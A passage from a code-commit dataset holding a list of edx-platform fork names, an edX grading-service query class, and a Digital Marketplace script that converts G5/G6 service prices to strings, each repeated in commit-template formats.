nnington/edx-platform,rue89-tech/edx-platform,MakeHer/edx-platform,cselis86/edx-platform,jamesblunt/edx-platform,ZLLab-Mooc/edx-platform,CredoReference/edx-platform,Livit/Livit.Learn.EdX,shurihell/testasia,syjeon/new_edx,doismellburning/edx-platform,TsinghuaX/edx-platform,kmoocdev/edx-platform,mushtaqak/edx-platform,unicri/edx-platform,ahmedaljazzar/edx-platform,UOMx/edx-platform,chauhanhardik/populo,bitifirefly/edx-platform,etzhou/edx-platform,kmoocdev/edx-platform,pepeportela/edx-platform,rismalrv/edx-platform,Softmotions/edx-platform,leansoft/edx-platform,chudaol/edx-platform,adoosii/edx-platform,4eek/edx-platform,nikolas/edx-platform,CourseTalk/edx-platform,jelugbo/tundex,IndonesiaX/edx-platform,Kalyzee/edx-platform,EduPepperPD/pepper2013,jbzdak/edx-platform,shubhdev/edx-platform,beacloudgenius/edx-platform,syjeon/new_edx,kursitet/edx-platform,UOMx/edx-platform,fintech-circle/edx-platform,xingyepei/edx-platform,shubhdev/openedx,dsajkl/123,bitifirefly/edx-platform,dcosentino/edx-platform,morenopc/edx-platform,pdehaye/theming-edx-platform,benpatterson/edx-platform,arifsetiawan/edx-platform,jelugbo/tundex,Stanford-Online/edx-platform,andyzsf/edx,deepsrijit1105/edx-platform,cpennington/edx-platform,carsongee/edx-platform,JioEducation/edx-platform,defance/edx-platform,Edraak/edraak-platform,DefyVentures/edx-platform,CourseTalk/edx-platform,tiagochiavericosta/edx-platform,jelugbo/tundex,Lektorium-LLC/edx-platform,ovnicraft/edx-platform,louyihua/edx-platform,rue89-tech/edx-platform,antoviaque/edx-platform,nttks/jenkins-test,torchingloom/edx-platform,benpatterson/edx-platform,doismellburning/edx-platform,jjmiranda/edx-platform,appliedx/edx-platform,shabab12/edx-platform,mjirayu/sit_academy,xingyepei/edx-platform,bdero/edx-platform,lduarte1991/edx-platform,rue89-tech/edx-platform,synergeticsedx/deployment-wipro,chudaol/edx-platform,rue89-tech/edx-platform,romain-li/edx-platform,arifsetiawan/edx-platform,UXE/local-edx,IndonesiaX/edx-platform,andyzsf/edx,philanthropy-u/edx-platform,appliedx/edx-platform,gymnasium/edx-platform,halvertoluke/edx-platform,mahendra-r/edx-platform,MSOpenTech/edx-platform,jazkarta/edx-platform,openfun/edx-platform,angelapper/edx-platform,jazkarta/edx-platform-for-isc,ferabra/edx-platform,zhenzhai/edx-platform,jolyonb/edx-platform,arbrandes/edx-platform,simbs/edx-platform,zerobatu/edx-platform,caesar2164/edx-platform,chudaol/edx-platform,ESOedX/edx-platform,leansoft/edx-platform,Stanford-Online/edx-platform,jzoldak/edx-platform,jamiefolsom/edx-platform,jbassen/edx-platform,mjirayu/sit_academy,bigdatauniversity/edx-platform,eestay/edx-platform,jazkarta/edx-platform-for-isc,wwj718/edx-platform,franosincic/edx-platform,jjmiranda/edx-platform,arifsetiawan/edx-platform,WatanabeYasumasa/edx-platform,xingyepei/edx-platform,sameetb-cuelogic/edx-platform-test,alu042/edx-platform,vikas1885/test1,utecuy/edx-platform,vasyarv/edx-platform,motion2015/a3,waheedahmed/edx-platform,CredoReference/edx-platform,a-parhom/edx-platform,itsjeyd/edx-platform,shubhdev/openedx,jamesblunt/edx-platform,solashirai/edx-platform,wwj718/edx-platform,marcore/edx-platform,CredoReference/edx-platform,chauhanhardik/populo_2,deepsrijit1105/edx-platform,appliedx/edx-platform,alexthered/kienhoc-platform,apigee/edx-platform,kalebhartje/schoolboost,Softmotions/edx-platform,AkA84/edx-platform,SivilTaram/edx-platform,Lektorium-LLC/edx-platform,cecep-edu/edx-platform,nikolas/edx-platform,hkawasaki/kawasaki-aio8-1,EduPepperPD/pepper2013,zofuthan/edx-platform,nagyistoce/edx-platform,louyihua/edx-platform,PepperPD/edx-pepper-platform,romain-li/edx-platform,dkarakats/edx-platform,DNFcode/edx-platform,ahmadiga/min_edx,pelikanchik/edx-platform,PepperPD/edx-pepper-platform,arifsetiawan/edx-platform,nttks/jenkins-test,y12uc231/edx-platform,wwj718/ANALYSE,caesar2164/edx-platform,antoviaque/edx-platform,ahmadio/edx-platform,rhndg/openedx,analyseuc3m/ANALYSE-v1,nikolas/edx-platform,philanthropy-u/edx-platform,pomegranited/edx-platform,don-github/edx-platform,knehez/edx-platform,sudheerchintala/LearnEraPlatForm,inares/edx-platform,rhndg/openedx,leansoft/edx-platform,JioEducation/edx-platform,apigee/edx-platform,zofuthan/edx-platform,leansoft/edx-platform,playm2mboy/edx-platform,miptliot/edx-platform,yokose-ks/edx-platform,jswope00/griffinx,nttks/jenkins-test,TeachAtTUM/edx-platform,IONISx/edx-platform,jzoldak/edx-platform,xuxiao19910803/edx,vikas1885/test1,atsolakid/edx-platform,longmen21/edx-platform,xuxiao19910803/edx-platform,beni55/edx-platform,nttks/edx-platform,nagyistoce/edx-platform,IndonesiaX/edx-platform,motion2015/edx-platform,4eek/edx-platform,shashank971/edx-platform,dsajkl/reqiop,martynovp/edx-platform,kalebhartje/schoolboost,jzoldak/edx-platform,apigee/edx-platform,eduNEXT/edx-platform,marcore/edx-platform,peterm-itr/edx-platform,Softmotions/edx-platform,mtlchun/edx,devs1991/test_edx_docmode,WatanabeYasumasa/edx-platform,solashirai/edx-platform,Ayub-Khan/edx-platform,zofuthan/edx-platform,msegado/edx-platform,raccoongang/edx-platform,jazkarta/edx-platform-for-isc,nanolearningllc/edx-platform-cypress,SravanthiSinha/edx-platform,gsehub/edx-platform,Kalyzee/edx-platform,mitocw/edx-platform,rismalrv/edx-platform,EDUlib/edx-platform,pabloborrego93/edx-platform,beni55/edx-platform,romain-li/edx-platform,hamzehd/edx-platform,mjg2203/edx-platform-seas,xingyepei/edx-platform,dsajkl/reqiop,ampax/edx-platform-backup,nanolearning/edx-platform,fly19890211/edx-platform,kmoocdev2/edx-platform,ovnicraft/edx-platform,hamzehd/edx-platform,nanolearning/edx-platform,cyanna/edx-platform,zofuthan/edx-platform,edry/edx-platform,simbs/edx-platform,y12uc231/edx-platform,MSOpenTech/edx-platform,rationalAgent/edx-platform-custom,abdoosh00/edraak,abdoosh00/edx-rtl-final,mitocw/edx-platform,JCBarahona/edX,sameetb-cuelogic/edx-platform-test,ahmadiga/min_edx,naresh21/synergetics-edx-platform,jswope00/griffinx,msegado/edx-platform,SivilTaram/edx-platform,ubc/edx-platform,motion2015/a3,jonathan-beard/edx-platform,shubhdev/edx-platform,Shrhawk/edx-platform,benpatterson/edx-platform,ampax/edx-platform,marcore/edx-platform,nagyistoce/edx-platform,EduPepperPDTesting/pepper2013-testing,J861449197/edx-platform,ahmedaljazzar/edx-platform,dkarakats/edx-platform,jbassen/edx-platform,marcore/edx-platform,ovnicraft/edx-platform,martynovp/edx-platform,edry/edx-platform,waheedahmed/edx-platform,angelapper/edx-platform,zubair-arbi/edx-platform,mushtaqak/edx-platform,unicri/edx-platform,itsjeyd/edx-platform,Kalyzee/edx-platform,eduNEXT/edx-platform,hkawasaki/kawasaki-aio8-2,bitifirefly/edx-platform,4eek/edx-platform,mjirayu/sit_academy,hmcmooc/muddx-platform,SravanthiSinha/edx-platform,EDUlib/edx-platform,shubhdev/edx-platform,jamesblunt/edx-platform,jolyonb/edx-platform,sameetb-cuelogic/edx-platform-test,abdoosh00/edx-rtl-final,carsongee/edx-platform,proversity-org/edx-platform,synergeticsedx/deployment-wipro,jelugbo/tundex,vismartltd/edx-platform,pdehaye/theming-edx-platform,PepperPD/edx-pepper-platform,bdero/edx-platform,B-MOOC/edx-platform,angelapper/edx-platform,stvstnfrd/edx-platform,openfun/edx-platform,ubc/edx-platform,SivilTaram/edx-platform,kmoocdev2/edx-platform,shabab12/edx-platform,shubhdev/edxOnBaadal,etzhou/edx-platform,martynovp/edx-platform,MSOpenTech/edx-platform,don-github/edx-platform,valtech-mooc/edx-platform,Stanford-Online/edx-platform,motion2015/edx-platform,AkA84/edx-platform,a-parhom/edx-platform,jamesblunt/edx-platform,valtech-mooc/edx-platform,antonve/s4-project-mooc,JCBarahona/edX,kalebhartje/schoolboost,dsajkl/123,knehez/edx-platform,pelikanchik/edx-platform,vikas1885/test1,nttks/edx-platform,WatanabeYasumasa/edx-platform,defance/edx-platform,Ayub-Khan/edx-platform,doismellburning/edx-platform,chudaol/edx-platform,ampax/edx-platform-backup,yokose-ks/edx-platform,synergeticsedx/deployment-wipro,raccoongang/edx-platform,bdero/edx-platform,JCBarahona/edX,vismartltd/edx-platform,benpatterson/edx-platform,praveen-pal/edx-platform,franosincic/edx-platform,jazkarta/edx-platform-for-isc,TeachAtTUM/edx-platform,shurihell/testasia,alexthered/kienhoc-platform,AkA84/edx-platform,MSOpenTech/edx-platform,y12uc231/edx-platform,eduNEXT/edx-platform,DNFcode/edx-platform,jazztpt/edx-platform,mtlchun/edx,zerobatu/edx-platform,shubhdev/edxOnBaadal,itsjeyd/edx-platform,mjg2203/edx-platform-seas,prarthitm/edxplatform,longmen21/edx-platform,auferack08/edx-platform,ESOedX/edx-platform,jazkarta/edx-platform,torchingloom/edx-platform,olexiim/edx-platform,hkawasaki/kawasaki-aio8-0,inares/edx-platform,arbrandes/edx-platform,lduarte1991/edx-platform,alexthered/kienhoc-platform,peterm-itr/edx-platform,louyihua/edx-platform,eduNEXT/edunext-platform,chauhanhardik/populo_2,Livit/Livit.Learn.EdX,carsongee/edx-platform,jswope00/griffinx,hkawasaki/kawasaki-aio8-2,martynovp/edx-platform,teltek/edx-platform,WatanabeYasumasa/edx-platform,playm2mboy/edx-platform,ahmadio/edx-platform,dsajkl/123,jamiefolsom/edx-platform,zhenzhai/edx-platform,IONISx/edx-platform,raccoongang/edx-platform,Semi-global/edx-platform,morenopc/edx-platform,hastexo/edx-platform,jamesblunt/edx-platform,UXE/local-edx,fintech-circle/edx-platform,etzhou/edx-platform,hamzehd/edx-platform,waheedahmed/edx-platform,iivic/BoiseStateX,edx/edx-platform,msegado/edx-platform,TsinghuaX/edx-platform,halvertoluke/edx-platform,LearnEra/LearnEraPlaftform,EduPepperPD/pepper2013,ampax/edx-platform-backup,EduPepperPDTesting/pepper2013-testing,xinjiguaike/edx-platform,mitocw/edx-platform,tiagochiavericosta/edx-platform,Endika/edx-platform,eduNEXT/edunext-platform,kmoocdev/edx-platform,hkawasaki/kawasaki-aio8-1,jbzdak/edx-platform,xinjiguaike/edx-platform,mcgachey/edx-platform,appsembler/edx-platform,miptliot/edx-platform,jbassen/edx-platform,y12uc231/edx-platform,Edraak/edx-platform,chand3040/cloud_that,utecuy/edx-platform,zhenzhai/edx-platform,polimediaupv/edx-platform,arifsetiawan/edx-platform,jamiefolsom/edx-platform,jazztpt/edx-platform,synergeticsedx/deployment-wipro,ZLLab-Mooc/edx-platform,alu042/edx-platform,appsembler/edx-platform,4eek/edx-platform,mbareta/edx-platform-ft,chauhanhardik/populo_2,antonve/s4-project-mooc,Semi-global/edx-platform,ampax/edx-platform,motion2015/edx-platform,xinjiguaike/edx-platform,proversity-org/edx-platform,SivilTaram/edx-platform,valtech-mooc/edx-platform,Edraak/circleci-edx-platform,polimediaupv/edx-platform,Livit/Livit.Learn.EdX,nanolearning/edx-platform,devs1991/test_edx_docmode,ahmadiga/min_edx,motion2015/edx-platform,apigee/edx-platform,pelikanchik/edx-platform,4eek/edx-platform,mbareta/edx-platform-ft,morpheby/levelup-by,beni55/edx-platform,rismalrv/edx-platform,adoosii/edx-platform,torchingloom/edx-platform,zerobatu/edx-platform,kmoocdev2/edx-platform,pku9104038/edx-platform,iivic/BoiseStateX,xuxiao19910803/edx-platform,RPI-OPENEDX/edx-platform,chauhanhardik/populo,xuxiao19910803/edx,fly19890211/edx-platform,vismartltd/edx-platform,10clouds/edx-platform,Unow/edx-platform,doganov/edx-platform,DNFcode/edx-platform,nttks/edx-platform,pepeportela/edx-platform,shubhdev/openedx,mcgachey/edx-platform,abdoosh00/edx-rtl-final,LICEF/edx-platform,EduPepperPD/pepper2013,longmen21/edx-platform,IONISx/edx-platform,antoviaque/edx-platform,UOMx/edx-platform,cpennington/edx-platform,wwj718/ANALYSE,mahendra-r/edx-platform,Endika/edx-platform,wwj718/edx-platform,shurihell/testasia,beni55/edx-platform,jazkarta/edx-platform,motion2015/a3,vasyarv/edx-platform,LearnEra/LearnEraPlaftform,EDUlib/edx-platform,hastexo/edx-platform,doismellburning/edx-platform,benpatterson/edx-platform,doganov/edx-platform,ESOedX/edx-platform,Shrhawk/edx-platform,kmoocdev/edx-platform,olexiim/edx-platform,pku9104038/edx-platform,praveen-pal/edx-platform,openfun/edx-platform,chand3040/cloud_that,morpheby/levelup-by,halvertoluke/edx-platform,jswope00/griffinx,ampax/edx-platform,chand3040/cloud_that,longmen21/edx-platform,CourseTalk/edx-platform,IITBinterns13/edx-platform-dev,Kalyzee/edx-platform,polimediaupv/edx-platform,stvstnfrd/edx-platform,procangroup/edx-platform,knehez/edx-platform,Edraak/circleci-edx-platform,zubair-arbi/edx-platform,UOMx/edx-platform,doganov/edx-platform,kmoocdev2/edx-platform,10clouds/edx-platform,auferack08/edx-platform,pepeportela/edx-platform,auferack08/edx-platform,edry/edx-platform,chudaol/edx-platform,eestay/edx-platform,louyihua/edx-platform,kursitet/edx-platform,dkarakats/edx-platform,TeachAtTUM/edx-platform,miptliot/edx-platform,iivic/BoiseStateX,alu042/edx-platform,hkawasaki/kawasaki-aio8-2,hastexo/edx-platform,eemirtekin/edx-platform,cognitiveclass/edx-platform,shubhdev/openedx,etzhou/edx-platform,motion2015/a3,sudheerchintala/LearnEraPlatForm,beacloudgenius/edx-platform,zubair-arbi/edx-platform,utecuy/edx-platform,Edraak/edraak-platform,zadgroup/edx-platform,ferabra/edx-platform,xuxiao19910803/edx-platform,prarthitm/edxplatform,vismartltd/edx-platform,openfun/edx-platform,nanolearningllc/edx-platform-cypress,kalebhartje/schoolboost,eemirtekin/edx-platform,vasyarv/edx-platform,mushtaqak/edx-platform,pelikanchik/edx-platform,TsinghuaX/edx-platform,olexiim/edx-platform,zubair-arbi/edx-platform,philanthropy-u/edx-platform,sudheerchintala/LearnEraPlatForm,eduNEXT/edx-platform,morenopc/edx-platform,10clouds/edx-platform,IITBinterns13/edx-platform-dev,vasyarv/edx-platform,shashank971/edx-platform,DNFcode/edx-platform,eestay/edx-platform,proversity-org/edx-platform,hkawasaki/kawasaki-aio8-0,cognitiveclass/edx-platform,shubhdev/openedx,zadgroup/edx-platform,hkawasaki/kawasaki-aio8-0,mcgachey/edx-platform,shashank971/edx-platform,edx-solutions/edx-platform,jswope00/GAI,leansoft/edx-platform,fintech-circle/edx-platform,pabloborrego93/edx-platform,iivic/BoiseStateX,jswope00/GAI,appsembler/edx-platform,zerobatu/edx-platform,bigdatauniversity/edx-platform,pomegranited/edx-platform,Unow/edx-platform,DefyVentures/edx-platform,olexiim/edx-platform,nikolas/edx-platform,cognitiveclass/edx-platform,pabloborrego93/edx-platform,mcgachey/edx-platform,dcosentino/edx-platform,MakeHer/edx-platform,cecep-edu/edx-platform,analyseuc3m/ANALYSE-v1,don-github/edx-platform,naresh21/synergetics-edx-platform,ferabra/edx-platform,morenopc/edx-platform,beni55/edx-platform,jamiefolsom/edx-platform,jolyonb/edx-platform,pabloborrego93/edx-platform,dsajkl/123,halvertoluke/edx-platform,lduarte1991/edx-platform,rhndg/openedx,devs1991/test_edx_docmode,hmcmooc/muddx-platform,J861449197/edx-platform,ferabra/edx-platform,a-parhom/edx-platform,romain-li/edx-platform,chrisndodge/edx-platform,jzoldak/edx-platform,kamalx/edx-platform,waheedahmed/edx-platform,hamzehd/edx-platform,naresh21/synergetics-edx-platform,rismalrv/edx-platform,mtlchun/edx,SravanthiSinha/edx-platform,B-MOOC/edx-platform,motion2015/a3,playm2mboy/edx-platform,edry/edx-platform,jjmiranda/edx-platform,ahmadiga/min_edx,adoosii/edx-platform,mushtaqak/edx-platform,jswope00/GAI,cpennington/edx-platform,nanolearningllc/edx-platform-cypress-2,ZLLab-Mooc/edx-platform,SivilTaram/edx-platform,jbzdak/edx-platform,edx/edx-platform,atsolakid/edx-platform,jbzdak/edx-platform,etzhou/edx-platform,vikas1885/test1,bitifirefly/edx-platform,andyzsf/edx,stvstnfrd/edx-platform,abdoosh00/edraak,andyzsf/edx,openfun/edx-platform,LearnEra/LearnEraPlaftform,BehavioralInsightsTeam/edx-platform,Edraak/edx-platform,TeachAtTUM/edx-platform,nanolearning/edx-platform,shurihell/testasia,shubhdev/edxOnBaadal,Ayub-Khan/edx-platform,CredoReference/edx-platform,polimediaupv/edx-platform,IONISx/edx-platform,mtlchun/edx,yokose-ks/edx-platform,xuxiao19910803/edx-platform,edx/edx-platform,proversity-org/edx-platform,gymnasium/edx-platform,ak2703/edx-platform,peterm-itr/edx-platform,nagyistoce/edx-platform,cognitiveclass/edx-platform,DefyVentures/edx-platform,dcosentino/edx-platform,J861449197/edx-platform,teltek/edx-platform,nttks/edx-platform,xinjiguaike/edx-platform,hkawasaki/kawasaki-aio8-1,franosincic/edx-platform,itsjeyd/edx-platform,simbs/edx-platform,shubhdev/edxOnBaadal,Edraak/circleci-edx-platform,UXE/local-edx,ahmedaljazzar/edx-platform,unicri/edx-platform,B-MOOC/edx-platform,procangroup/edx-platform,jswope00/griffinx,jamiefolsom/edx-platform,eemirtekin/edx-platform,EduPepperPD/pepper2013,zhenzhai/edx-platform,RPI-OPENEDX/edx-platform,bigdatauniversity/edx-platform,vikas1885/test1,DefyVentures/edx-platform,rationalAgent/edx-platform-custom,lduarte1991/edx-platform,rismalrv/edx-platform,amir-qayyum-khan/edx-platform,Semi-global/edx-platform,nanolearningllc/edx-platform-cypress,beacloudgenius/edx-platform,appliedx/edx-platform,y12uc231/edx-platform,cognitiveclass/edx-platform,atsolakid/edx-platform,bdero/edx-platform,rationalAgent/edx-platform-custom,Shrhawk/edx-platform,ahmedaljazzar/edx-platform,edx-solutions/edx-platform,Unow/edx-platform,ubc/edx-platform,kamalx/edx-platform,shashank971/edx-platform,shurihell/testasia,playm2mboy/edx-platform,syjeon/new_edx,jazkarta/edx-platform-for-isc,PepperPD/edx-pepper-platform,abdoosh00/edx-rtl-final,amir-qayyum-khan/edx-platform,sameetb-cuelogic/edx-platform-test,DNFcode/edx-platform,wwj718/edx-platform,torchingloom/edx-platform,antoviaque/edx-platform,martynovp/edx-platform,adoosii/edx-platform,waheedahmed/edx-platform,AkA84/edx-platform,tanmaykm/edx-platform,kamalx/edx-platform,pdehaye/theming-edx-platform,doganov/edx-platform,cecep-edu/edx-platform,abdoosh00/edraak,atsolakid/edx-platform,solashirai/edx-platform,MakeHer/edx-platform,IONISx/edx-platform,valtech-mooc/edx-platform,gymnasium/edx-platform,dsajkl/reqiop,unicri/edx-platform,jruiperezv/ANALYSE,mbareta/edx-platform-ft,Kalyzee/edx-platform,wwj718/ANALYSE,ovnicraft/edx-platform,OmarIthawi/edx-platform,EduPepperPDTesting/pepper2013-testing,edry/edx-platform,PepperPD/edx-pepper-platform,J861449197/edx-platform,morpheby/levelup-by,morenopc/edx-platform,ampax/edx-platform-backup,ahmadio/edx-platform,defance/edx-platform,cselis86/edx-platform,OmarIthawi/edx-platform,a-parhom/edx-platform,kalebhartje/schoolboost,kmoocdev2/edx-platform,IndonesiaX/edx-platform,franosincic/edx-platform,valtech-mooc/edx-platform,iivic/BoiseStateX,caesar2164/edx-platform,nagyistoce/edx-platform,procangroup/edx-platform,inares/edx-platform,jbzdak/edx-platform,nttks/jenkins-test,Endika/edx-platform,praveen-pal/edx-platform,jazztpt/edx-platform,ferabra/edx-platform,eemirtekin/edx-platform,jruiperezv/ANALYSE,devs1991/test_edx_docmode,motion2015/edx-platform,ahmadio/edx-platform,jazztpt/edx-platform,Semi-global/edx-platform,shabab12/edx-platform,cyanna/edx-platform,knehez/edx-platform,alexthered/kienhoc-platform,MakeHer/edx-platform,yokose-ks/edx-platform,naresh21/synergetics-edx-platform,pepeportela/edx-platform,arbrandes/edx-platform,nanolearningllc/edx-platform-cypress,TsinghuaX/edx-platform,nanolearningllc/edx-platform-cypress-2,ahmadio/edx-platform,rationalAgent/edx-platform-custom,ubc/edx-platform,pku9104038/edx-platform,vismartltd/edx-platform,teltek/edx-platform,tiagochiavericosta/edx-platform,solashirai/edx-platform,cselis86/edx-platform,jolyonb/edx-platform,nanolearningllc/edx-platform-cypress,miptliot/edx-platform,jazkarta/edx-platform,kursitet/edx-platform,rationalAgent/edx-platform-custom,mushtaqak/edx-platform,jazkarta/edx-platform,RPI-OPENEDX/edx-platform,devs1991/test_edx_docmode,hkawasaki/kawasaki-aio8-0,chrisndodge/edx-platform,dkarakats/edx-platform,Endika/edx-platform,chand3040/cloud_that,MSOpenTech/edx-platform,chauhanhardik/populo_2,chrisndodge/edx-platform,analyseuc3m/ANALYSE-v1,bigdatauniversity/edx-platform,philanthropy-u/edx-platform,zadgroup/edx-platform,hkawasaki/kawasaki-aio8-2,carsongee/edx-platform,hkawasaki/kawasaki-aio8-1,shubhdev/edxOnBaadal,xuxiao19910803/edx,longmen21/edx-platform,kxliugang/edx-platform,gsehub/edx-platform,deepsrijit1105/edx-platform,JioEducation/edx-platform,inares/edx-platform,adoosii/edx-platform,nanolearningllc/edx-platform-cypress-2,IndonesiaX/edx-platform,ampax/edx-platform,auferack08/edx-platform,polimediaupv/edx-platform,LearnEra/LearnEraPlaftform,edx-solutions/edx-platform,kxliugang/edx-platform
|
Add service to query controller for eta of submission and to check if name is unique
|
import json
import logging
import requests
from requests.exceptions import RequestException, ConnectionError, HTTPError
import sys
from grading_service import GradingService
from grading_service import GradingServiceError
from django.conf import settings
from django.http import HttpResponse, Http404
log = logging.getLogger(__name__)
class ControllerQueryService(GradingService):
"""
Interface to staff grading backend.
"""
def __init__(self, config):
super(ControllerQuery, self).__init__(config)
self.check_eta_url = self.url + '/get_submission_eta/'
self.is_unique_url = self.url + '/is_name_unique/'
def check_if_name_is_unique(self, location, problem_id, course_id):
params = {
'course_id': course_id,
'location' : location,
'problem_id' : problem_id
}
response = self.get(self.is_unique_url, params)
return response
def check_for_eta(self, location):
params = {
'location' : location,
}
response = self.get(self.check_eta_url, params)
return response
|
<commit_before><commit_msg>Add service to query controller for eta of submission and to check if name is unique<commit_after>
|
import json
import logging
import requests
from requests.exceptions import RequestException, ConnectionError, HTTPError
import sys
from grading_service import GradingService
from grading_service import GradingServiceError
from django.conf import settings
from django.http import HttpResponse, Http404
log = logging.getLogger(__name__)
class ControllerQueryService(GradingService):
"""
Interface to staff grading backend.
"""
def __init__(self, config):
super(ControllerQuery, self).__init__(config)
self.check_eta_url = self.url + '/get_submission_eta/'
self.is_unique_url = self.url + '/is_name_unique/'
def check_if_name_is_unique(self, location, problem_id, course_id):
params = {
'course_id': course_id,
'location' : location,
'problem_id' : problem_id
}
response = self.get(self.is_unique_url, params)
return response
def check_for_eta(self, location):
params = {
'location' : location,
}
response = self.get(self.check_eta_url, params)
return response
|
Add service to query controller for eta of submission and to check if name is uniqueimport json
import logging
import requests
from requests.exceptions import RequestException, ConnectionError, HTTPError
import sys
from grading_service import GradingService
from grading_service import GradingServiceError
from django.conf import settings
from django.http import HttpResponse, Http404
log = logging.getLogger(__name__)
class ControllerQueryService(GradingService):
"""
Interface to staff grading backend.
"""
def __init__(self, config):
super(ControllerQuery, self).__init__(config)
self.check_eta_url = self.url + '/get_submission_eta/'
self.is_unique_url = self.url + '/is_name_unique/'
def check_if_name_is_unique(self, location, problem_id, course_id):
params = {
'course_id': course_id,
'location' : location,
'problem_id' : problem_id
}
response = self.get(self.is_unique_url, params)
return response
def check_for_eta(self, location):
params = {
'location' : location,
}
response = self.get(self.check_eta_url, params)
return response
|
<commit_before><commit_msg>Add service to query controller for eta of submission and to check if name is unique<commit_after>import json
import logging
import requests
from requests.exceptions import RequestException, ConnectionError, HTTPError
import sys
from grading_service import GradingService
from grading_service import GradingServiceError
from django.conf import settings
from django.http import HttpResponse, Http404
log = logging.getLogger(__name__)
class ControllerQueryService(GradingService):
"""
Interface to staff grading backend.
"""
def __init__(self, config):
super(ControllerQuery, self).__init__(config)
self.check_eta_url = self.url + '/get_submission_eta/'
self.is_unique_url = self.url + '/is_name_unique/'
def check_if_name_is_unique(self, location, problem_id, course_id):
params = {
'course_id': course_id,
'location' : location,
'problem_id' : problem_id
}
response = self.get(self.is_unique_url, params)
return response
def check_for_eta(self, location):
params = {
'location' : location,
}
response = self.get(self.check_eta_url, params)
return response
|
|
84ac53d9b6070bc82259c6f099a7044eda2510f7
|
scripts/oneoff/fix-pricing.py
|
scripts/oneoff/fix-pricing.py
|
#!/usr/bin/env python
"""Fix G5 and G6 price fields to be strings rather than numbers
Usage:
fix-pricing.py <api_endpoint> <api_access_token>
"""
from multiprocessing.pool import ThreadPool
from docopt import docopt
from dmutils import apiclient
def update(client):
def do_update(data):
i, service = data
if i % 1000 == 0:
print(i)
if service['frameworkSlug'] in ['g-cloud-5', 'g-cloud-6']:
change = False
if isinstance(service.get('priceMin'), (int, float)):
change = True
service['priceMin'] = '{}'.format(service['priceMin'])
if isinstance(service.get('priceMax'), (int, float)):
change = True
service['priceMax'] = '{}'.format(service['priceMax'])
if change:
try:
client.update_service(service['id'], service, 'migration')
except apiclient.APIError as e:
print(e.message)
print(service)
pass
return do_update
def main(api_url, api_access_token):
client = apiclient.DataAPIClient(api_url, api_access_token)
pool = ThreadPool(10)
for i in pool.imap_unordered(update(client), enumerate(client.find_services_iter())):
pass
if __name__ == "__main__":
arguments = docopt(__doc__)
main(
api_url=arguments['<api_endpoint>'],
api_access_token=arguments['<api_access_token>'],
)
|
Add a script to fix G5 and G6 service prices
|
Add a script to fix G5 and G6 service prices
This script converts G5 and G6 price fields to from numbers to strings.
It doesn't make any attempt to format them nicely, however, neither
would the frontend when displaying them.
|
Python
|
mit
|
alphagov/digitalmarketplace-api,alphagov/digitalmarketplace-api,alphagov/digitalmarketplace-api
|
Add a script to fix G5 and G6 service prices
This script converts G5 and G6 price fields to from numbers to strings.
It doesn't make any attempt to format them nicely, however, neither
would the frontend when displaying them.
|
#!/usr/bin/env python
"""Fix G5 and G6 price fields to be strings rather than numbers
Usage:
fix-pricing.py <api_endpoint> <api_access_token>
"""
from multiprocessing.pool import ThreadPool
from docopt import docopt
from dmutils import apiclient
def update(client):
def do_update(data):
i, service = data
if i % 1000 == 0:
print(i)
if service['frameworkSlug'] in ['g-cloud-5', 'g-cloud-6']:
change = False
if isinstance(service.get('priceMin'), (int, float)):
change = True
service['priceMin'] = '{}'.format(service['priceMin'])
if isinstance(service.get('priceMax'), (int, float)):
change = True
service['priceMax'] = '{}'.format(service['priceMax'])
if change:
try:
client.update_service(service['id'], service, 'migration')
except apiclient.APIError as e:
print(e.message)
print(service)
pass
return do_update
def main(api_url, api_access_token):
client = apiclient.DataAPIClient(api_url, api_access_token)
pool = ThreadPool(10)
for i in pool.imap_unordered(update(client), enumerate(client.find_services_iter())):
pass
if __name__ == "__main__":
arguments = docopt(__doc__)
main(
api_url=arguments['<api_endpoint>'],
api_access_token=arguments['<api_access_token>'],
)
|
<commit_before><commit_msg>Add a script to fix G5 and G6 service prices
This script converts G5 and G6 price fields to from numbers to strings.
It doesn't make any attempt to format them nicely, however, neither
would the frontend when displaying them.<commit_after>
|
#!/usr/bin/env python
"""Fix G5 and G6 price fields to be strings rather than numbers
Usage:
fix-pricing.py <api_endpoint> <api_access_token>
"""
from multiprocessing.pool import ThreadPool
from docopt import docopt
from dmutils import apiclient
def update(client):
def do_update(data):
i, service = data
if i % 1000 == 0:
print(i)
if service['frameworkSlug'] in ['g-cloud-5', 'g-cloud-6']:
change = False
if isinstance(service.get('priceMin'), (int, float)):
change = True
service['priceMin'] = '{}'.format(service['priceMin'])
if isinstance(service.get('priceMax'), (int, float)):
change = True
service['priceMax'] = '{}'.format(service['priceMax'])
if change:
try:
client.update_service(service['id'], service, 'migration')
except apiclient.APIError as e:
print(e.message)
print(service)
pass
return do_update
def main(api_url, api_access_token):
client = apiclient.DataAPIClient(api_url, api_access_token)
pool = ThreadPool(10)
for i in pool.imap_unordered(update(client), enumerate(client.find_services_iter())):
pass
if __name__ == "__main__":
arguments = docopt(__doc__)
main(
api_url=arguments['<api_endpoint>'],
api_access_token=arguments['<api_access_token>'],
)
|
Add a script to fix G5 and G6 service prices
This script converts G5 and G6 price fields to from numbers to strings.
It doesn't make any attempt to format them nicely, however, neither
would the frontend when displaying them.#!/usr/bin/env python
"""Fix G5 and G6 price fields to be strings rather than numbers
Usage:
fix-pricing.py <api_endpoint> <api_access_token>
"""
from multiprocessing.pool import ThreadPool
from docopt import docopt
from dmutils import apiclient
def update(client):
def do_update(data):
i, service = data
if i % 1000 == 0:
print(i)
if service['frameworkSlug'] in ['g-cloud-5', 'g-cloud-6']:
change = False
if isinstance(service.get('priceMin'), (int, float)):
change = True
service['priceMin'] = '{}'.format(service['priceMin'])
if isinstance(service.get('priceMax'), (int, float)):
change = True
service['priceMax'] = '{}'.format(service['priceMax'])
if change:
try:
client.update_service(service['id'], service, 'migration')
except apiclient.APIError as e:
print(e.message)
print(service)
pass
return do_update
def main(api_url, api_access_token):
client = apiclient.DataAPIClient(api_url, api_access_token)
pool = ThreadPool(10)
for i in pool.imap_unordered(update(client), enumerate(client.find_services_iter())):
pass
if __name__ == "__main__":
arguments = docopt(__doc__)
main(
api_url=arguments['<api_endpoint>'],
api_access_token=arguments['<api_access_token>'],
)
|
<commit_before><commit_msg>Add a script to fix G5 and G6 service prices
This script converts G5 and G6 price fields to from numbers to strings.
It doesn't make any attempt to format them nicely, however, neither
would the frontend when displaying them.<commit_after>#!/usr/bin/env python
"""Fix G5 and G6 price fields to be strings rather than numbers
Usage:
fix-pricing.py <api_endpoint> <api_access_token>
"""
from multiprocessing.pool import ThreadPool
from docopt import docopt
